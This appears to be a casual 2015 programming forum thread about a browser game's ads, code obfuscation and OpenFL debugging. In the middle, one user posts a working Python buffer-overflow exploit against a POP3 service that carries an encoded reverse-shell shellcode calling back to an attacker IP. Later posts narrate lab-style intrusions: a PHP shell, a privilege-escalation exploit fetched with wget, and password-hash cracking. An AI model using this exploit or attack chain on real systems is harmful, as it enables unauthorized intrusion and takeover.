Added SFX to Xirang!
Careful when you go from Ghost Torture Pass to the Yin Mountains! You may get a heart attack.
At 5/25/15 10:05 AM, FlyingColours wrote: Added SFX to Xirang!
Careful when you go from Ghost Torture Pass to the Yin Mountains! You may get a heart attack.
Sounds like you need to tone the volume down lol.
At 5/25/15 10:46 AM, MSGhero wrote:At 5/25/15 10:05 AM, FlyingColours wrote: Added SFX to Xirang!Sounds like you need to tone the volume down lol.
Careful when you go from Ghost Torture Pass to the Yin Mountains! You may get a heart attack.
Awww.... I love it though! It happens at the exact moment where the loading doors open to reveal a gate, and is totally Hollywoody... It even matches the Beethoven in the background!
You know, do you guys think it's good enough for Tom to sponsor it?
(Flashads don't work in the game, obviously...)
I'll be very happy to put up huge Tankman posters on the loading screen (which appears whenever the player changes location), and I'm working on adding medals.
At 5/25/15 11:19 AM, FlyingColours wrote: You know, do you guys think it's good enough for Tom to sponsor it?
(Flashads don't work in the game, obviously...)
I think you still get preroll and page ads.
At 5/25/15 11:49 AM, MSGhero wrote:At 5/25/15 11:19 AM, FlyingColours wrote: You know, do you guys think it's good enough for Tom to sponsor it?I think you still get preroll and page ads.
(Flashads don't work in the game, obviously...)
They seem to be much less effective than in-game adverts though...
Since you have had games frontpaged before, do you think that is the case?
#!/usr/bin/python
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
overflow = "\x90" * 2606 # Create the buffer overflow
EIP = "\x8F\x35\x4A\x5F" # JMP ESP in SLMFC.dll (x86, little endian)
swap = "\x90" * 16 # Stack space for decoding
shell = ("\xdd\xc0\xb8\x6f\x1b\x9d\x92\xd9\x74\x24\xf4\x5a\x2b\xc9" +
"\xb1\x4f\x31\x42\x19\x83\xea\xfc\x03\x42\x15\x8d\xee\x61" +
"\x7a\xd8\x11\x9a\x7b\xba\x98\x7f\x4a\xe8\xff\xf4\xff\x3c" +
"\x8b\x59\x0c\xb7\xd9\x49\x87\xb5\xf5\x7e\x20\x73\x20\xb0" +
"\xb1\xb2\xec\x1e\x71\xd5\x90\x5c\xa6\x35\xa8\xae\xbb\x34" +
"\xed\xd3\x34\x64\xa6\x98\xe7\x98\xc3\xdd\x3b\x99\x03\x6a" +
"\x03\xe1\x26\xad\xf0\x5b\x28\xfe\xa9\xd0\x62\xe6\xc2\xbe" +
"\x52\x17\x06\xdd\xaf\x5e\x23\x15\x5b\x61\xe5\x64\xa4\x53" +
"\xc9\x2a\x9b\x5b\xc4\x33\xdb\x5c\x37\x46\x17\x9f\xca\x50" +
"\xec\xdd\x10\xd5\xf1\x46\xd2\x4d\xd2\x77\x37\x0b\x91\x74" +
"\xfc\x58\xfd\x98\x03\x8d\x75\xa4\x88\x30\x5a\x2c\xca\x16" +
"\x7e\x74\x88\x37\x27\xd0\x7f\x48\x37\xbc\x20\xec\x33\x2f" +
"\x34\x96\x19\x38\xf9\xa4\xa1\xb8\x95\xbf\xd2\x8a\x3a\x6b" +
"\x7d\xa7\xb3\xb5\x7a\xc8\xe9\x01\x14\x37\x12\x71\x3c\xfc" +
"\x46\x21\x56\xd5\xe6\xaa\xa6\xda\x32\x7c\xf7\x74\xed\x3c" +
"\xa7\x34\x5d\xd4\xad\xba\x82\xc4\xcd\x10\xb5\xc3\x5a\x5b" +
"\x6e\xc5\x47\x33\x6d\xd9\x76\x7f\xf8\x3f\x12\x6f\xad\xe8" +
"\x8b\x16\xf4\x62\x2d\xd6\x22\xe2\xce\x45\xa9\xf2\x99\x75" +
"\x66\xa5\xce\x48\x7f\x23\xe3\xf3\x29\x51\xfe\x62\x11\xd1" +
"\x25\x57\x9c\xd8\xa8\xe3\xba\xca\x74\xeb\x86\xbe\x28\xba" +
"\x50\x68\x8f\x14\x13\xc2\x59\xca\xfd\x82\x1c\x20\x3e\xd4" +
"\x20\x6d\xc8\x38\x90\xd8\x8d\x47\x1d\x8d\x19\x30\x43\x2d" +
"\xe5\xeb\xc7\x5d\xac\xb1\x6e\xf6\x69\x20\x33\x9b\x89\x9f" +
"\x70\xa2\x09\x15\x09\x51\x11\x5c\x0c\x1d\x95\x8d\x7c\x0e" +
"\x70\xb1\xd3\x2f\x51") # msfpayload windows/shell_reverse_tcp LHOST=192.168.14.221 LPORT=443 R | msfencode -b "\x00\x0a\x0d" -e x86/shikata_ga_nai
padding = "\x90" * (3500 - 2606 - 4 - 16 - 341) # Stack padding, 3500 bytes total - buffer overflow - EIP - swap space - shell payload
try:
print "\nSending buffer.."
s.connect(("192.168.15.70", 110))
data = s.recv(1024)
s.send("USER username\r\n")
data = s.recv(1024)
s.send("PASS " + overflow + EIP + swap + shell + padding + "\r\n")
print "Done!"
except:
print "Could not connect!"
I rode a buffer overflow into a reverse shell with python, I feel kinda badass :D
Programming stuffs (tutorials and extras)
PM me (instead of MintPaw) if you're confuzzled.
thank Skaren for the sig :P
At 5/25/15 12:10 PM, FlyingColours wrote: Since you have had games frontpaged before, do you think that is the case?
At 43k portal ads each and 139/68k flash ads and 2.5/10k preroll ads, flash ads have portal ads beat by only $10. Portal ads have the biggest ecpm (>$4), flash ads have less than half, and preroll are like 2/3 3/4 portal ads.
At 5/25/15 03:42 PM, MSGhero wrote:At 5/25/15 12:10 PM, FlyingColours wrote: Since you have had games frontpaged before, do you think that is the case?At 43k portal ads each and 139/68k flash ads and 2.5/10k preroll ads, flash ads have portal ads beat by only $10. Portal ads have the biggest ecpm (>$4), flash ads have less than half, and preroll are like 2/3 3/4 portal ads.
Ah, I see. They're not so bad then.
Also, I think I'm gonna put up links to my userpage and gain a little from that.
By the way, do you think I should obfuscate the code before I publish?
I'm not sure why anyone would steal my code though. Some of the code I added late in the development process is pretty spaghetti 'cos I know I'll rewrite the engine if I make a sequel.
At 5/25/15 09:21 PM, FlyingColours wrote: By the way, do you think I should obfuscate the code before I publish?
I'm not sure how js works, but it's not worth it for flash. No one really cares about your code. I guess it wouldn't hurt. Haxe's output is a terrible thing to look through on any platform... people who encounter obfuscated code would probably quit after 45 seconds.
Security through obscurity is not security at all.
Programming stuffs (tutorials and extras)
PM me (instead of MintPaw) if you're confuzzled.
thank Skaren for the sig :P
At 5/25/15 09:21 PM, FlyingColours wrote: By the way, do you think I should obfuscate the code before I publish?
Yes. Minify it, too.
At 5/26/15 04:30 AM, egg82 wrote: Security through obscurity is not security at all.
Why not? It's certainly not the best, but it definitely secures your code from at least a portion of people and, considering no security method is 100% effective, the fact it does something at the very least makes it a security measure.
It's your best (and as far as I can think, only) for client side JavaScript.
Okay... If Sam says to do it, then I'll do it.
Of course I'm going to minify! I have to make up for that embarrassing code copy-pasting that I don't want anyone to know about.
Speaking of which, I'll have to fix two minor bugs, add in volume control, add the Tankman posters anyway, make fancy scrollbars and possible a fancy cursor, test the remaining medals, and I'm all set. Probably.
What do you think about the icon?
Edit: Wow, I can edit now! This is such a touching moment.
At 5/26/15 08:14 AM, Sam wrote: Why not? It's certainly not the best, but it definitely secures your code from at least a portion of people and, considering no security method is 100% effective, the fact it does something at the very least makes it a security measure.
It's your best (and as far as I can think, only) for client side JavaScript.
Most decompilers have built-in deobf for many common languages.
Also you can just use debuggers..
Or, ya know, not. Because some 16-year-old's game code isn't worth it unless there's MySQL information hardcoded in there or something. In which case, we're back to deobf and some quick string searches. (though honestly you wouldn't need deobf for that)
If you want to screw with JS, there's easier ways as well.
Obfuscation offers a weak solution to a (virtually) nonexistent problem.
Programming stuffs (tutorials and extras)
PM me (instead of MintPaw) if you're confuzzled.
thank Skaren for the sig :P
At 5/27/15 01:13 AM, egg82 wrote: Obfuscation offers a weak solution to a (virtually) nonexistent problem.
It takes a grand total of 30 seconds to paste your code into an obfuscator. The trade off is worth it, in almost every case. Out of interest, I looked up a "deobfuscter", ripped their source, obfuscated it, and then used their tool to deobfuscate:
Original Source
Obfuscated -> Deobfuscated
I realise some may be better than others and the method of obfuscation affects the output, but I certainly wouldn't want to trawl through that code to find something. It at least deters a group of people from having access to your source code in a readable and usable format.
Basically, I see no reason not to.
At 5/27/15 01:13 AM, egg82 wrote: Most decompilers have built-in deobf for many common languages.
Also you can just use debuggers..
Or, ya know, not. Because some 16-year-old's game code isn't worth it
Actually, I'm 17 now and will be 18 in a few months. I've grown :P
unless there's MySQL information hardcoded in there or something. In which case, we're back to deobf and some quick string searches. (though honestly you wouldn't need deobf for that)
Why would anyone do that in JS?
At 5/27/15 07:19 AM, Sam wrote: Original Source
Obfuscated -> Deobfuscated
You forgot the unescape option, which turns the top array of hex values into this:
var _0xc5a6 = ["", "space_after_anon_function", "jslint_happy", "braces_on_own_line", "expand", "collapse", "brace_style", "indent_size", "indent_char", " ", "preserve_newlines", "undefined", "max_preserve_newlines", "keep_array_indentation", "space_before_conditional", "indent_case", "length", "pop", "\x0A", "\x0D", "replace", "indexOf", "substring", "push", "eat_next_space", "mode", "if_line", "indentation_level", "var_line", "var_line_reindented", "case_body", "TK_COMMENT", "BLOCK", "[EXPRESSION]", "[INDENTED-EXPRESSION]", "(EXPRESSION)", "(FOR-EXPRESSION)", "(COND-EXPRESSION)", "DO_BLOCK", "previous_mode", "charAt", "case", "return", "do", "if", "throw", "else", "TK_EOF", "\x09", "indentation_baseline", "match", "-", "+", "TK_WORD", "in", "TK_OPERATOR", "TK_EQUALS", "var", "(", "[", "TK_START_EXPR", ")", "]", "TK_END_EXPR", "{", "TK_START_BLOCK", "}", "TK_END_BLOCK", ";", "TK_SEMICOLON", "/", "*", "/*", "*/", "TK_INLINE_COMMENT", "TK_BLOCK_COMMENT", "\'", "\"", "\\", "TK_STRING", "#", "!", "=", "[]", "{}", "<", "<!--", "in_html_comment", "-->", "TK_UNKNOWN", "split", "\x0A\x0D\x09 ", "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_$", "0123456789", "+ - * / % & ++ -- = += -= *= /= %= == === != !== > < >= <= >> << >>> >>>= >>= <<= && &= | || ! !! , : ? ^ ^= |= ::", ",", "continue,try,throw,return,var,if,switch,case,default,for,while,break,function", "for", "while", ".", "function", "typeof", "catch", "expand-strict", "default", "in_case_statement", ":", "in_case", "NONE", "toLowerCase", "finally", "NEWLINE", "end-expand", "SPACE", "get", "set", "new", "var_line_tainted", "OBJECT", "::", "--", "++", "ternary_depth", "?", "slice", "join", "js_beautify", "value", "text", "getElementById", "eval", "write", "writeln", "createPopup", "createElement", "Syntax Error:\x0A", "message", "alert", "Paste code here...", "script"];
You can then make a quick script that gets the values from that array and puts them back into whatever variables are using them. Then if you want to you can modify the function variables to be just x2, x3, etc. instead of _0xeed0x2, _0xeed0x3, etc. It'll be much easier to read, then.
Again, assuming you want to put the effort into it. If you don't, then you didn't really want to do it in the first place.
True, though. I suppose if it only takes a minute then go for it. Just don't loose your source code or you'll get to go back through your obfuscated AND decompiled code.
Programming stuffs (tutorials and extras)
PM me (instead of MintPaw) if you're confuzzled.
thank Skaren for the sig :P
Phoenix down!
Web fuzzer got robots.txt
Manually opened robots.txt to discover hidden /internal directory
View->Source to discover web page is a custom front-end for a system called "Advanced Comment System"
Google search revealed remote code execution exploit
Got PHP shell with apache permissions
uname showed kernel version compatible with 2009-2692 local privilege escalation exploit and fstab showed executable /tmp directory
compiled c executable on attacking machine, hosted on attacking http server, and wget to /tmp
executed, root acquired
Ka-boom.
The programmer in me is cringing at all the code I smashed into 8 bytes of memory
Programming stuffs (tutorials and extras)
PM me (instead of MintPaw) if you're confuzzled.
thank Skaren for the sig :P
At 6/4/15 05:05 PM, CodeCrunch wrote: http://www.scribd.com/doc/228831637/Optimal-Tip-to-Tip-Efficiency
The hell did I just read.. ?
Programming stuffs (tutorials and extras)
PM me (instead of MintPaw) if you're confuzzled.
thank Skaren for the sig :P
At 6/4/15 05:05 PM, CodeCrunch wrote: http://www.scribd.com/doc/228831637/Optimal-Tip-to-Tip-Efficiency
That's a... rather elaborate joke.
At 6/4/15 05:05 PM, CodeCrunch wrote: http://www.scribd.com/doc/228831637/Optimal-Tip-to-Tip-Efficiency
Wasn't this joke in a film?
At 6/7/15 04:20 PM, Sam wrote: Wasn't this joke in a film?
"Zack and Miri Make a Porno" I think
Same movie that had the "Double-Dutch Rudder"?
Don't ask me how I know this
Programming stuffs (tutorials and extras)
PM me (instead of MintPaw) if you're confuzzled.
thank Skaren for the sig :P
At 6/7/15 04:20 PM, Sam wrote:At 6/4/15 05:05 PM, CodeCrunch wrote: http://www.scribd.com/doc/228831637/Optimal-Tip-to-Tip-EfficiencyWasn't this joke in a film?
It was from the finale of the first season of Silicon Valley.
Another one bites the dust. Alice is mine.
Simple buffer overflow from CVE-2003-0352. I should have seen that coming, I spent way too much time dinking around with the open terminal service port.
I did find a password-protected "bank-account.zip" on the C drive while I was looking for my "proof.txt" file. I downloaded that and I'll take a closer look at it after I decrypt the NT password hashes on the system.
Decrypted NTLM via online resource.
Not the password for the zip, though. Looks like I'll need to try to pop it open.
Broken password via my 980.
Yeah, should've seen that one coming as well. I swear I tried that one earlier, though.
Oh, what's this?
Where's that machine named "bob" again? I've got an idea of what that password might be.
Programming stuffs (tutorials and extras)
PM me (instead of MintPaw) if you're confuzzled.
thank Skaren for the sig :P
Bob, you're a giant pain in my ass.
Spent almost 12 hours attacking this one machine. I got in, but who knew privilege escalation on an XP machine with SP1 on it would be such a massive pain. Plenty of "local root" exploits for SP2 or 3, and I even found a service execution exploit that let me run things as SYSTEM/LocalService but every time I get a meterpreter running on that it dies in a few seconds.
I feel like the service I'm replacing is restarting because it's not a valid service executable.
Ughhh....
Also, the hell am I doing with that password I found on Alice? Should I log into the MASTER system with it?
Programming stuffs (tutorials and extras)
PM me (instead of MintPaw) if you're confuzzled.
thank Skaren for the sig :P
BOB, WHY DO YOU HATE EVERY FIBER OF MY BEING
AAAAAAAAAAAAAAHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH
New target. Fuck it, bob can have his stupid computer
Programming stuffs (tutorials and extras)
PM me (instead of MintPaw) if you're confuzzled.
thank Skaren for the sig :P
https://egg82.ninja/
Any thoughts?
Not quite done yet. It's all custom written. I could have just used Wordpress, but meh.
Also I has PGP key. I feel special now :3
Programming stuffs (tutorials and extras)
PM me (instead of MintPaw) if you're confuzzled.
thank Skaren for the sig :P
At 6/18/15 04:29 AM, egg82 wrote: https://egg82.ninja/
Any thoughts?
Not quite done yet. It's all custom written. I could have just used Wordpress, but meh.
Also I has PGP key. I feel special now :3
Cool! A .ninja TLD? :O
At 6/21/15 03:42 PM, CodeCrunch wrote: What do when openfl can't tell me where in my code there's a problem and points to itself instead?
What target are you exporting to?
My first guess is the last line in the screencap, "invalid *". This happens to me in neko when I don't initialize all my numbers, assuming they'll default to 0 like in flash. It's either null or undefined or NaN or something, and you can't multiply those, and it crashes.
Second guess is update openfl and lime to the latest master versions and try again. If you just did, maybe reinstall them bc sometimes they'll release a fix without telling anyone or updating the version number.
